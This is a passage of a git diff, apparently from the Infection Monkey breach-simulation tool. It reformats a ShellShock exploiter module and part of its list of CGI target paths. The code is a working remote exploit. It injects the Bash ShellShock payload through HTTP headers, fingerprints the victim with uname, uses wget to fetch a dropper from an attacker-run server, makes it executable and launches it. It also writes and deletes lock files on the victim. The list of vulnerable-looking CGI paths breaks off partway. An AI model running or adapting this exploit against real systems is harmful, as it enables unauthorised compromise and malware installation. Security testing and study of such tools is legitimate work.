logging.getLogger(__name__) TIMEOUT = 2 -TEST_COMMAND = '/bin/uname -a' +TEST_COMMAND = "/bin/uname -a" DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder -LOCK_HELPER_FILE = '/tmp/monkey_shellshock' +LOCK_HELPER_FILE = "/tmp/monkey_shellshock" class ShellShockExploiter(HostExploiter): - _attacks = { - "Content-type": "() { :;}; echo; " - } + _attacks = {"Content-type": "() { :;}; echo; "} - _TARGET_OS_TYPE = ['linux'] - _EXPLOITED_SERVICE = 'Bash' + _TARGET_OS_TYPE = ["linux"] + _EXPLOITED_SERVICE = "Bash" def __init__(self, host): super(ShellShockExploiter, self).__init__(host) self.HTTP = [str(port) for port in self._config.HTTP_PORTS] - self.success_flag = ''.join( - choice(string.ascii_uppercase + string.digits - ) for _ in range(20)) + self.success_flag = "".join( + choice(string.ascii_uppercase + string.digits) for _ in range(20) + ) self.skip_exist = self._config.skip_exploit_if_file_exist def _exploit_host(self): # start by picking ports candidate_services = { - service: self.host.services[service] for service in self.host.services if - ('name' in self.host.services[service]) and (self.host.services[service]['name'] == 'http') + service: self.host.services[service] + for service in self.host.services + if ("name" in self.host.services[service]) + and (self.host.services[service]["name"] == "http") } - valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in self.HTTP if - 'tcp-' + str(port) in candidate_services] + valid_ports = [ + (port, candidate_services["tcp-" + str(port)]["data"][1]) + for port in self.HTTP + if "tcp-" + str(port) in candidate_services + ] http_ports = [port[0] for port in valid_ports if not port[1]] https_ports = [port[0] for port in valid_ports if port[1]] LOG.info( - 'Scanning %s, ports [%s] for vulnerable CGI pages' % ( - self.host, ",".join([str(port[0]) for port in valid_ports])) + "Scanning %s, ports [%s] for vulnerable CGI pages" + % (self.host, ",".join([str(port[0]) for port in valid_ports])) ) attackable_urls = [] @@ -69,39 +76,45 @@ class ShellShockExploiter(HostExploiter): exploitable_urls = [url for url in exploitable_urls if url[0] is True] # we want to report all vulnerable URLs even if we didn't succeed - self.exploit_info['vulnerable_urls'] = [url[1] for url in exploitable_urls] + self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls] # now try URLs until we install something on victim for _, url, header, exploit in exploitable_urls: LOG.info("Trying to attack host %s with %s URL" % (self.host, url)) # same attack script as sshexec # for any failure, quit and don't try other URLs - if not self.host.os.get('type'): + if not self.host.os.get("type"): try: - uname_os_attack = exploit + '/bin/uname -o' + uname_os_attack = exploit + "/bin/uname -o" uname_os = self.attack_page(url, header, uname_os_attack) - if 'linux' in uname_os: - self.host.os['type'] = 'linux' + if "linux" in uname_os: + self.host.os["type"] = "linux" else: LOG.info("SSH Skipping unknown os: %s", uname_os) return False except Exception as exc: LOG.debug("Error running uname os command on victim %r: (%s)", self.host, exc) return False - if not self.host.os.get('machine'): + if not self.host.os.get("machine"): try: - uname_machine_attack = exploit + '/bin/uname -m' + uname_machine_attack = exploit + "/bin/uname -m" uname_machine = self.attack_page(url, header, uname_machine_attack) - if '' != uname_machine: - self.host.os['machine'] = uname_machine.lower().strip() + if "" != uname_machine: + self.host.os["machine"] = uname_machine.lower().strip() except Exception as exc: - LOG.debug("Error running uname machine command on victim %r: (%s)", self.host, exc) + LOG.debug( + "Error running uname machine command on victim %r: (%s)", self.host, exc + ) return False # copy the monkey dropper_target_path_linux = self._config.dropper_target_path_linux - if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) + if self.skip_exist and ( + self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux) + ): + LOG.info( + "Host %s was already infected under the current configuration, done" % self.host + ) return True # return already infected src_path = get_target_monkey(self.host) @@ -119,12 +132,12 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") return False - download_command = '/usr/bin/wget %s -O %s;' % ( - http_path, dropper_target_path_linux) + download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux) download = exploit + download_command - self.attack_page(url, header, - download) # we ignore failures here since it might take more than TIMEOUT time + self.attack_page( + url, header, download + ) # we ignore failures here since it might take more than TIMEOUT time http_thread.join(DOWNLOAD_TIMEOUT) http_thread.stop() @@ -132,30 +145,44 @@ class ShellShockExploiter(HostExploiter): self._remove_lock_file(exploit, url, header) if (http_thread.downloads != 1) or ( - 'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): + "ELF" + not in self.check_remote_file_exists( + url, header, exploit, dropper_target_path_linux + ) + ): LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) continue # turn the monkey into an executable - chmod = '/bin/chmod +x %s' % dropper_target_path_linux + chmod = "/bin/chmod +x %s" % dropper_target_path_linux run_path = exploit + chmod self.attack_page(url, header, run_path) T1222Telem(ScanStatus.USED, chmod, self.host).send() # run the monkey cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG) - cmdline += build_monkey_commandline(self.host, - get_monkey_depth() - 1, - HTTPTools.get_port_from_url(url), - dropper_target_path_linux) - cmdline += ' & ' + cmdline += build_monkey_commandline( + self.host, + get_monkey_depth() - 1, + HTTPTools.get_port_from_url(url), + dropper_target_path_linux, + ) + cmdline += " & " run_path = exploit + cmdline self.attack_page(url, header, run_path) - LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", - self._config.dropper_target_path_linux, self.host, cmdline) + LOG.info( + "Executed monkey '%s' on remote victim %r (cmdline=%r)", + self._config.dropper_target_path_linux, + self.host, + cmdline, + ) - if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)): + if not ( + self.check_remote_file_exists( + url, header, exploit, self._config.monkey_log_path_linux + ) + ): LOG.info("Log file does not exist, monkey might not have run") continue self.add_executed_cmd(cmdline) @@ -169,7 +196,7 @@ class ShellShockExploiter(HostExploiter): Checks if a remote file exists and returns the content if so file_path should be fully qualified """ - cmdline = '/usr/bin/head -c 4 %s' % file_path + cmdline = "/usr/bin/head -c 4 %s" % file_path run_path = exploit + cmdline resp = cls.attack_page(url, header, run_path) if resp: @@ -187,24 +214,24 @@ class ShellShockExploiter(HostExploiter): LOG.debug("Trying exploit for %s" % url) for header, exploit in list(attacks.items()): - attack = exploit + ' echo ' + self.success_flag + "; " + TEST_COMMAND + attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND result = self.attack_page(url, header, attack) if self.success_flag in result: LOG.info("URL %s looks vulnerable" % url) return True, url, header, exploit else: LOG.debug("URL %s does not seem to be vulnerable with %s header" % (url, header)) - return False, + return (False,) def _create_lock_file(self, exploit, url, header): if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE): return False - cmd = exploit + 'echo AAAA > %s' % LOCK_HELPER_FILE + cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE self.attack_page(url, header, cmd) return True def _remove_lock_file(self, exploit, url, header): - cmd = exploit + 'rm %s' % LOCK_HELPER_FILE + cmd = exploit + "rm %s" % LOCK_HELPER_FILE self.attack_page(url, header, cmd) @staticmethod @@ -213,7 +240,9 @@ class ShellShockExploiter(HostExploiter): try: LOG.debug("Header is: %s" % header) LOG.debug("Attack is: %s" % attack) - r = requests.get(url, headers={header: attack}, verify=False, timeout=TIMEOUT) # noqa: DUO123 + r = requests.get( + url, headers={header: attack}, verify=False, timeout=TIMEOUT + ) # noqa: DUO123 result = r.content.decode() return result except requests.exceptions.RequestException as exc: @@ -226,9 +255,9 @@ class ShellShockExploiter(HostExploiter): Checks if which urls exist :return: Sequence of URLs to try and attack """ - attack_path = 'http://' + attack_path = "http://" if is_https: - attack_path = 'https://' + attack_path = "https://" attack_path = attack_path + str(host) + ":" + str(port) reqs = [] timeout = False @@ -240,7 +269,9 @@ class ShellShockExploiter(HostExploiter): timeout = True break if timeout: - LOG.debug("Some connections timed out while sending request to potentially vulnerable urls.") + LOG.debug( + "Some connections timed out while sending request to potentially vulnerable urls." + ) valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok] urls = [resp.url for resp in valid_resps] diff --git a/monkey/infection_monkey/exploit/shellshock_resources.py b/monkey/infection_monkey/exploit/shellshock_resources.py index 46851dde1..3a128b23e 100644 --- a/monkey/infection_monkey/exploit/shellshock_resources.py +++ b/monkey/infection_monkey/exploit/shellshock_resources.py @@ -2,407 +2,407 @@ # copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list CGI_FILES = ( - r'/', - r'/admin.cgi', - r'/administrator.cgi', - r'/agora.cgi', - r'/aktivate/cgi-bin/catgy.cgi', - r'/analyse.cgi', - r'/apps/web/vs_diag.cgi', - r'/axis-cgi/buffer/command.cgi', - r'/b2-include/b2edit.showposts.php', - r'/bandwidth/index.cgi', - r'/bigconf.cgi', - r'/cartcart.cgi', - r'/cart.cgi', - r'/ccbill/whereami.cgi', - r'/cgi-bin/14all-1.1.cgi', - r'/cgi-bin/14all.cgi', - r'/cgi-bin/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp3.cgi', - r'/cgi-bin/a1stats/a1disp4.cgi', - r'/cgi-bin/addbanner.cgi', - r'/cgi-bin/add_ftp.cgi', - r'/cgi-bin/adduser.cgi', - r'/cgi-bin/admin/admin.cgi', - r'/cgi-bin/admin.cgi', - r'/cgi-bin/admin/getparam.cgi', - r'/cgi-bin/adminhot.cgi', - r'/cgi-bin/admin.pl', - r'/cgi-bin/admin/setup.cgi', - r'/cgi-bin/adminwww.cgi', - r'/cgi-bin/af.cgi', - r'/cgi-bin/aglimpse.cgi', - r'/cgi-bin/alienform.cgi', - r'/cgi-bin/AnyBoard.cgi', - r'/cgi-bin/architext_query.cgi', - r'/cgi-bin/astrocam.cgi', - r'/cgi-bin/AT-admin.cgi', - r'/cgi-bin/AT-generate.cgi', - r'/cgi-bin/auction/auction.cgi', - r'/cgi-bin/auktion.cgi', - r'/cgi-bin/ax-admin.cgi', - r'/cgi-bin/ax.cgi', - r'/cgi-bin/axs.cgi', - r'/cgi-bin/badmin.cgi', - r'/cgi-bin/banner.cgi', - r'/cgi-bin/bannereditor.cgi', - r'/cgi-bin/bb-ack.sh', - r'/cgi-bin/bb-histlog.sh', - r'/cgi-bin/bb-hist.sh', - r'/cgi-bin/bb-hostsvc.sh', - r'/cgi-bin/bb-replog.sh', - r'/cgi-bin/bb-rep.sh', - r'/cgi-bin/bbs_forum.cgi', - r'/cgi-bin/bigconf.cgi', - r'/cgi-bin/bizdb1-search.cgi', - r'/cgi-bin/blog/mt-check.cgi', - r'/cgi-bin/blog/mt-load.cgi', - r'/cgi-bin/bnbform.cgi', - r'/cgi-bin/book.cgi', - r'/cgi-bin/boozt/admin/index.cgi', - r'/cgi-bin/bsguest.cgi', - r'/cgi-bin/bslist.cgi', - r'/cgi-bin/build.cgi', - r'/cgi-bin/bulk/bulk.cgi', - r'/cgi-bin/cached_feed.cgi', - r'/cgi-bin/cachemgr.cgi', - r'/cgi-bin/calendar/index.cgi', - r'/cgi-bin/cartmanager.cgi', - r'/cgi-bin/cbmc/forums.cgi', - r'/cgi-bin/ccvsblame.cgi', - r'/cgi-bin/c_download.cgi', - r'/cgi-bin/cgforum.cgi', - r'/cgi-bin/.cgi', - r'/cgi-bin/cgi_process', - r'/cgi-bin/classified.cgi', - r'/cgi-bin/classifieds.cgi', - r'/cgi-bin/classifieds/classifieds.cgi', - r'/cgi-bin/classifieds/index.cgi', - r'/cgi-bin/.cobalt/alert/service.cgi', - r'/cgi-bin/.cobalt/message/message.cgi', - r'/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', - r'/cgi-bin/commandit.cgi', - r'/cgi-bin/commerce.cgi', - r'/cgi-bin/common/listrec.pl', - r'/cgi-bin/compatible.cgi', - r'/cgi-bin/Count.cgi', - r'/cgi-bin/csChatRBox.cgi', - r'/cgi-bin/csGuestBook.cgi', - r'/cgi-bin/csLiveSupport.cgi', - r'/cgi-bin/CSMailto.cgi', - r'/cgi-bin/CSMailto/CSMailto.cgi', - r'/cgi-bin/csNews.cgi', - r'/cgi-bin/csNewsPro.cgi', - r'/cgi-bin/csPassword.cgi', - r'/cgi-bin/csPassword/csPassword.cgi', - r'/cgi-bin/csSearch.cgi', - r'/cgi-bin/csv_db.cgi', - r'/cgi-bin/cvsblame.cgi', - r'/cgi-bin/cvslog.cgi', - r'/cgi-bin/cvsquery.cgi', - r'/cgi-bin/cvsqueryform.cgi', - r'/cgi-bin/day5datacopier.cgi', - r'/cgi-bin/day5datanotifier.cgi', - r'/cgi-bin/db_manager.cgi', - r'/cgi-bin/dbman/db.cgi', - r'/cgi-bin/dcforum.cgi', - r'/cgi-bin/dcshop.cgi', - r'/cgi-bin/dfire.cgi', - r'/cgi-bin/diagnose.cgi', - r'/cgi-bin/dig.cgi', - r'/cgi-bin/directorypro.cgi', - r'/cgi-bin/download.cgi', - r'/cgi-bin/e87_Ba79yo87.cgi', - r'/cgi-bin/emu/html/emumail.cgi', - r'/cgi-bin/emumail.cgi', - r'/cgi-bin/emumail/emumail.cgi', - r'/cgi-bin/enter.cgi', - r'/cgi-bin/environ.cgi', - r'/cgi-bin/ezadmin.cgi', - r'/cgi-bin/ezboard.cgi', - r'/cgi-bin/ezman.cgi', - r'/cgi-bin/ezshopper2/loadpage.cgi', - r'/cgi-bin/ezshopper3/loadpage.cgi', - r'/cgi-bin/ezshopper/loadpage.cgi', - r'/cgi-bin/ezshopper/search.cgi', - r'/cgi-bin/faqmanager.cgi', - r'/cgi-bin/FileSeek2.cgi', - r'/cgi-bin/FileSeek.cgi', - r'/cgi-bin/finger.cgi', - r'/cgi-bin/flexform.cgi', - r'/cgi-bin/fom.cgi', - r'/cgi-bin/fom/fom.cgi', - r'/cgi-bin/FormHandler.cgi', - r'/cgi-bin/FormMail.cgi', - r'/cgi-bin/gbadmin.cgi', - r'/cgi-bin/gbook/gbook.cgi', - r'/cgi-bin/generate.cgi', - r'/cgi-bin/getdoc.cgi', - r'/cgi-bin/gH.cgi', - r'/cgi-bin/gm-authors.cgi', - r'/cgi-bin/gm.cgi', - r'/cgi-bin/gm-cplog.cgi', - r'/cgi-bin/guestbook.cgi', - r'/cgi-bin/handler', - r'/cgi-bin/handler.cgi', - r'/cgi-bin/handler/netsonar', - r'/cgi-bin/hitview.cgi', - r'/cgi-bin/hsx.cgi', - r'/cgi-bin/html2chtml.cgi', - r'/cgi-bin/html2wml.cgi', - r'/cgi-bin/htsearch.cgi', - r'/cgi-bin/hw.sh', # testing - r'/cgi-bin/icat', - r'/cgi-bin/if/admin/nph-build.cgi', - r'/cgi-bin/ikonboard/help.cgi', - r'/cgi-bin/ImageFolio/admin/admin.cgi', - r'/cgi-bin/imageFolio.cgi', - r'/cgi-bin/index.cgi', - r'/cgi-bin/infosrch.cgi', - r'/cgi-bin/jammail.pl', - r'/cgi-bin/journal.cgi', - r'/cgi-bin/lastlines.cgi', - r'/cgi-bin/loadpage.cgi', - r'/cgi-bin/login.cgi', - r'/cgi-bin/logit.cgi', - r'/cgi-bin/log-reader.cgi', - r'/cgi-bin/lookwho.cgi', - r'/cgi-bin/lwgate.cgi', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/MachineInfo', - r'/cgi-bin/magiccard.cgi', - r'/cgi-bin/mail/emumail.cgi', - r'/cgi-bin/maillist.cgi', - r'/cgi-bin/mailnews.cgi', - r'/cgi-bin/mail/nph-mr.cgi', - r'/cgi-bin/main.cgi', - r'/cgi-bin/main_menu.pl', - r'/cgi-bin/man.sh', - r'/cgi-bin/mini_logger.cgi', - r'/cgi-bin/mmstdod.cgi', - r'/cgi-bin/moin.cgi', - r'/cgi-bin/mojo/mojo.cgi', - r'/cgi-bin/mrtg.cgi', - r'/cgi-bin/mt.cgi', - r'/cgi-bin/mt/mt.cgi', - r'/cgi-bin/mt/mt-check.cgi', - r'/cgi-bin/mt/mt-load.cgi', - r'/cgi-bin/mt-static/mt-check.cgi', - r'/cgi-bin/mt-static/mt-load.cgi', - r'/cgi-bin/musicqueue.cgi', - r'/cgi-bin/myguestbook.cgi', - r'/cgi-bin/.namazu.cgi', - r'/cgi-bin/nbmember.cgi', - r'/cgi-bin/netauth.cgi', - r'/cgi-bin/netpad.cgi', - r'/cgi-bin/newsdesk.cgi', - r'/cgi-bin/nlog-smb.cgi', - r'/cgi-bin/nph-emumail.cgi', - r'/cgi-bin/nph-exploitscanget.cgi', - r'/cgi-bin/nph-publish.cgi', - r'/cgi-bin/nph-test.cgi', - r'/cgi-bin/pagelog.cgi', - r'/cgi-bin/pbcgi.cgi', - r'/cgi-bin/perlshop.cgi', - r'/cgi-bin/pfdispaly.cgi', - r'/cgi-bin/pfdisplay.cgi', - r'/cgi-bin/phf.cgi', - r'/cgi-bin/photo/manage.cgi', - r'/cgi-bin/photo/protected/manage.cgi', - r'/cgi-bin/php-cgi', - r'/cgi-bin/php.cgi', - r'/cgi-bin/php.fcgi', - r'/cgi-bin/ping.sh', - r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', - r'/cgi-bin/pollssi.cgi', - r'/cgi-bin/postcards.cgi', - r'/cgi-bin/powerup/r.cgi', - r'/cgi-bin/printenv', - r'/cgi-bin/probecontrol.cgi', - r'/cgi-bin/profile.cgi', - r'/cgi-bin/publisher/search.cgi', - r'/cgi-bin/quickstore.cgi', - r'/cgi-bin/quizme.cgi', - r'/cgi-bin/ratlog.cgi', - r'/cgi-bin/r.cgi', - r'/cgi-bin/register.cgi', - r'/cgi-bin/replicator/webpage.cgi/', - r'/cgi-bin/responder.cgi', - r'/cgi-bin/robadmin.cgi', - r'/cgi-bin/robpoll.cgi', - r'/cgi-bin/rtpd.cgi', - r'/cgi-bin/sbcgi/sitebuilder.cgi', - r'/cgi-bin/scoadminreg.cgi', - r'/cgi-bin-sdb/printenv', - r'/cgi-bin/sdbsearch.cgi', - r'/cgi-bin/search', - r'/cgi-bin/search.cgi', - r'/cgi-bin/search/search.cgi', - r'/cgi-bin/sendform.cgi', - r'/cgi-bin/shop.cgi', - r'/cgi-bin/shopper.cgi', - r'/cgi-bin/shopplus.cgi', - r'/cgi-bin/showcheckins.cgi', - r'/cgi-bin/simplestguest.cgi', - r'/cgi-bin/simplestmail.cgi', - r'/cgi-bin/smartsearch.cgi', - r'/cgi-bin/smartsearch/smartsearch.cgi', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.bat', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/snorkerz.cmd', - r'/cgi-bin/sojourn.cgi', - r'/cgi-bin/spin_client.cgi', - r'/cgi-bin/start.cgi', - r'/cgi-bin/status', - r'/cgi-bin/status_cgi', - r'/cgi-bin/store/agora.cgi', - r'/cgi-bin/store.cgi', - r'/cgi-bin/store/index.cgi', - r'/cgi-bin/survey.cgi', - r'/cgi-bin/sync.cgi', - r'/cgi-bin/talkback.cgi', - r'/cgi-bin/technote/main.cgi', - r'/cgi-bin/test2.pl', - r'/cgi-bin/test-cgi', - r'/cgi-bin/test.cgi', - r'/cgi-bin/testing_whatever', - r'/cgi-bin/test/test.cgi', - r'/cgi-bin/tidfinder.cgi', - r'/cgi-bin/tigvote.cgi', - r'/cgi-bin/title.cgi', - r'/cgi-bin/top.cgi', - r'/cgi-bin/traffic.cgi', - r'/cgi-bin/troops.cgi', - r'/cgi-bin/ttawebtop.cgi/', - r'/cgi-bin/ultraboard.cgi', - r'/cgi-bin/upload.cgi', - r'/cgi-bin/urlcount.cgi', - r'/cgi-bin/viewcvs.cgi', - r'/cgi-bin/view_help.cgi', - r'/cgi-bin/viralator.cgi', - r'/cgi-bin/virgil.cgi', - r'/cgi-bin/vote.cgi', - r'/cgi-bin/vpasswd.cgi', - r'/cgi-bin/way-board.cgi', - r'/cgi-bin/way-board/way-board.cgi', - r'/cgi-bin/webbbs.cgi', - r'/cgi-bin/webcart/webcart.cgi', - r'/cgi-bin/webdist.cgi', - r'/cgi-bin/webif.cgi', - r'/cgi-bin/webmail/html/emumail.cgi', - r'/cgi-bin/webmap.cgi', - r'/cgi-bin/webspirs.cgi', - r'/cgi-bin/Web_Store/web_store.cgi', - r'/cgi-bin/whois.cgi', - r'/cgi-bin/whois_raw.cgi', - r'/cgi-bin/whois/whois.cgi', - r'/cgi-bin/wrap', - r'/cgi-bin/wrap.cgi', - r'/cgi-bin/wwwboard.cgi.cgi', - r'/cgi-bin/YaBB/YaBB.cgi', - r'/cgi-bin/zml.cgi', - r'/cgi-mod/index.cgi', - r'/cgis/wwwboard/wwwboard.cgi', - r'/cgi-sys/addalink.cgi', - r'/cgi-sys/defaultwebpage.cgi', - r'/cgi-sys/domainredirect.cgi', - r'/cgi-sys/entropybanner.cgi', - r'/cgi-sys/entropysearch.cgi', - r'/cgi-sys/FormMail-clone.cgi', - r'/cgi-sys/helpdesk.cgi', - r'/cgi-sys/mchat.cgi', - r'/cgi-sys/randhtml.cgi', - r'/cgi-sys/realhelpdesk.cgi', - r'/cgi-sys/realsignup.cgi', - r'/cgi-sys/signup.cgi', - r'/connector.cgi', - r'/cp/rac/nsManager.cgi', - r'/create_release.sh', - r'/CSNews.cgi', - r'/csPassword.cgi', - r'/dcadmin.cgi', - r'/dcboard.cgi', - r'/dcforum.cgi', - r'/dcforum/dcforum.cgi', - r'/debuff.cgi', - r'/debug.cgi', - r'/details.cgi', - r'/edittag/edittag.cgi', - r'/emumail.cgi', - r'/enter_buff.cgi', - r'/enter_bug.cgi', - r'/ez2000/ezadmin.cgi', - r'/ez2000/ezboard.cgi', - r'/ez2000/ezman.cgi', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo', - r'/fcgi-bin/echo2', - r'/fcgi-bin/echo2', - r'/Gozila.cgi', - r'/hitmatic/analyse.cgi', - r'/hp_docs/cgi-bin/index.cgi', - r'/html/cgi-bin/cgicso', - r'/html/cgi-bin/cgicso', - r'/index.cgi', - r'/info.cgi', - r'/infosrch.cgi', - r'/login.cgi', - r'/mailview.cgi', - r'/main.cgi', - r'/megabook/admin.cgi', - r'/ministats/admin.cgi', - r'/mods/apage/apage.cgi', - r'/_mt/mt.cgi', - r'/musicqueue.cgi', - r'/ncbook.cgi', - r'/newpro.cgi', - r'/newsletter.sh', - r'/oem_webstage/cgi-bin/oemapp_cgi', - r'/page.cgi', - r'/parse_xml.cgi', - r'/photodata/manage.cgi', - r'/photo/manage.cgi', - r'/print.cgi', - r'/process_buff.cgi', - r'/process_bug.cgi', - r'/pub/english.cgi', - r'/quikmail/nph-emumail.cgi', - r'/quikstore.cgi', - r'/reviews/newpro.cgi', - r'/ROADS/cgi-bin/search.pl', - r'/sample01.cgi', - r'/sample02.cgi', - r'/sample03.cgi', - r'/sample04.cgi', - r'/sampleposteddata.cgi', - r'/scancfg.cgi', - r'/scancfg.cgi', - r'/servers/link.cgi', - r'/setpasswd.cgi', - r'/SetSecurity.shm', - r'/shop/member_html.cgi', - r'/shop/normal_html.cgi', - r'/site_searcher.cgi', - r'/siteUserMod.cgi', - r'/submit.cgi', - r'/technote/print.cgi', - r'/template.cgi', - r'/test.cgi', - r'/ucsm/isSamInstalled.cgi', - r'/upload.cgi', - r'/userreg.cgi', - r'/users/scripts/submit.cgi', - r'/vood/cgi-bin/vood_view.cgi', - r'/Web_Store/web_store.cgi', - r'/webtools/bonsai/ccvsblame.cgi', - r'/webtools/bonsai/cvsblame.cgi', - r'/webtools/bonsai/cvslog.cgi', - r'/webtools/bonsai/cvsquery.cgi', - r'/webtools/bonsai/cvsqueryform.cgi', - r'/webtools/bonsai/showcheckins.cgi', - r'/wwwadmin.cgi', - r'/wwwboard.cgi', - r'/wwwboard/wwwboard.cgi' + r"/", + r"/admin.cgi", + r"/administrator.cgi", + r"/agora.cgi", + r"/aktivate/cgi-bin/catgy.cgi", + r"/analyse.cgi", + r"/apps/web/vs_diag.cgi", + r"/axis-cgi/buffer/command.cgi", + r"/b2-include/b2edit.showposts.php", + r"/bandwidth/index.cgi", + r"/bigconf.cgi", + r"/cartcart.cgi", + r"/cart.cgi", + r"/ccbill/whereami.cgi", + r"/cgi-bin/14all-1.1.cgi", + r"/cgi-bin/14all.cgi", + r"/cgi-bin/a1disp3.cgi", + r"/cgi-bin/a1stats/a1disp3.cgi", + r"/cgi-bin/a1stats/a1disp4.cgi", + r"/cgi-bin/addbanner.cgi", + r"/cgi-bin/add_ftp.cgi", + r"/cgi-bin/adduser.cgi", + r"/cgi-bin/admin/admin.cgi", + r"/cgi-bin/admin.cgi", + r"/cgi-bin/admin/getparam.cgi", + r"/cgi-bin/adminhot.cgi", + r"/cgi-bin/admin.pl", + r"/cgi-bin/admin/setup.cgi", + r"/cgi-bin/adminwww.cgi", + r"/cgi-bin/af.cgi", + r"/cgi-bin/aglimpse.cgi", + r"/cgi-bin/alienform.cgi", + r"/cgi-bin/AnyBoard.cgi", + r"/cgi-bin/architext_query.cgi", + r"/cgi-bin/astrocam.cgi", + r"/cgi-bin/AT-admin.cgi", + r"/cgi-bin/AT-generate.cgi", + r"/cgi-bin/auction/auction.cgi", + r"/cgi-bin/auktion.cgi", + r"/cgi-bin/ax-admin.cgi", + r"/cgi-bin/ax.cgi", + r"/cgi-bin/axs.cgi", + r"/cgi-bin/badmin.cgi", + r"/cgi-bin/banner.cgi", + r"/cgi-bin/bannereditor.cgi", + r"/cgi-bin/bb-ack.sh", + r"/cgi-bin/bb-histlog.sh", + r"/cgi-bin/bb-hist.sh", + r"/cgi-bin/bb-hostsvc.sh", + r"/cgi-bin/bb-replog.sh", + r"/cgi-bin/bb-rep.sh", + r"/cgi-bin/bbs_forum.cgi", + r"/cgi-bin/bigconf.cgi", + r"/cgi-bin/bizdb1-search.cgi", + r"/cgi-bin/blog/mt-check.cgi", + r"/cgi-bin/blog/mt-load.cgi", + r"/cgi-bin/bnbform.cgi", + r"/cgi-bin/book.cgi", + r"/cgi-bin/boozt/admin/index.cgi", + r"/cgi-bin/bsguest.cgi", + r"/cgi-bin/bslist.cgi", + r"/cgi-bin/build.cgi", + r"/cgi-bin/bulk/bulk.cgi", + r"/cgi-bin/cached_feed.cgi", + r"/cgi-bin/cachemgr.cgi", + r"/cgi-bin/calendar/index.cgi", + r"/cgi-bin/cartmanager.cgi", + r"/cgi-bin/cbmc/forums.cgi", + r"/cgi-bin/ccvsblame.cgi", + r"/cgi-bin/c_download.cgi", + r"/cgi-bin/cgforum.cgi", + r"/cgi-bin/.cgi", + r"/cgi-bin/cgi_process", + r"/cgi-bin/classified.cgi", + r"/cgi-bin/classifieds.cgi", + r"/cgi-bin/classifieds/classifieds.cgi", + r"/cgi-bin/classifieds/index.cgi", + r"/cgi-bin/.cobalt/alert/service.cgi", + r"/cgi-bin/.cobalt/message/message.cgi", + r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi", + r"/cgi-bin/commandit.cgi", + r"/cgi-bin/commerce.cgi", + r"/cgi-bin/common/listrec.pl", + r"/cgi-bin/compatible.cgi", + r"/cgi-bin/Count.cgi", + r"/cgi-bin/csChatRBox.cgi", + r"/cgi-bin/csGuestBook.cgi", + r"/cgi-bin/csLiveSupport.cgi", + r"/cgi-bin/CSMailto.cgi", + r"/cgi-bin/CSMailto/CSMailto.cgi", + r"/cgi-bin/csNews.cgi", + r"/cgi-bin/csNewsPro.cgi", + r"/cgi-bin/csPassword.cgi", + r"/cgi-bin/csPassword/csPassword.cgi", + r"/cgi-bin/csSearch.cgi", + r"/cgi-bin/csv_db.cgi", + r"/cgi-bin/cvsblame.cgi", + r"/cgi-bin/cvslog.cgi", + r"/cgi-bin/cvsquery.cgi", + r"/cgi-bin/cvsqueryform.cgi", + r"/cgi-bin/day5datacopier.cgi", + r"/cgi-bin/day5datanotifier.cgi", + r"/cgi-bin/db_manager.cgi", + r"/cgi-bin/dbman/db.cgi", + r"/cgi-bin/dcforum.cgi", + r"/cgi-bin/dcshop.cgi", + r"/cgi-bin/dfire.cgi", + r"/cgi-bin/diagnose.cgi", + r"/cgi-bin/dig.cgi", + r"/cgi-bin/directorypro.cgi", + r"/cgi-bin/download.cgi", + r"/cgi-bin/e87_Ba79yo87.cgi", + r"/cgi-bin/emu/html/emumail.cgi", + r"/cgi-bin/emumail.cgi", + r"/cgi-bin/emumail/emumail.cgi", + r"/cgi-bin/enter.cgi", + r"/cgi-bin/environ.cgi", + r"/cgi-bin/ezadmin.cgi", + r"/cgi-bin/ezboard.cgi", + r"/cgi-bin/ezman.cgi", + r"/cgi-bin/ezshopper2/loadpage.cgi", + r"/cgi-bin/ezshopper3/loadpage.cgi", + r"/cgi-bin/ezshopper/loadpage.cgi", + r"/cgi-bin/ezshopper/search.cgi", + r"/cgi-bin/faqmanager.cgi", + r"/cgi-bin/FileSeek2.cgi", + r"/cgi-bin/FileSeek.cgi", + r"/cgi-bin/finger.cgi", + r"/cgi-bin/flexform.cgi", + r"/cgi-bin/fom.cgi", + r"/cgi-bin/fom/fom.cgi", + r"/cgi-bin/FormHandler.cgi", + r"/cgi-bin/FormMail.cgi", + r"/cgi-bin/gbadmin.cgi", + r"/cgi-bin/gbook/gbook.cgi", + r"/cgi-bin/generate.cgi", + r"/cgi-bin/getdoc.cgi", + r"/cgi-bin/gH.cgi", + r"/cgi-bin/gm-authors.cgi", + r"/cgi-bin/gm.cgi", + r"/cgi-bin/gm-cplog.cgi", + r"/cgi-bin/guestbook.cgi", + r"/cgi-bin/handler", + r"/cgi-bin/handler.cgi", + r"/cgi-bin/handler/netsonar", + r"/cgi-bin/hitview.cgi", + r"/cgi-bin/hsx.cgi", + r"/cgi-bin/html2chtml.cgi", + r"/cgi-bin/html2wml.cgi", + r"/cgi-bin/htsearch.cgi", + r"/cgi-bin/hw.sh", # testing + r"/cgi-bin/icat", + r"/cgi-bin/if/admin/nph-build.cgi", + 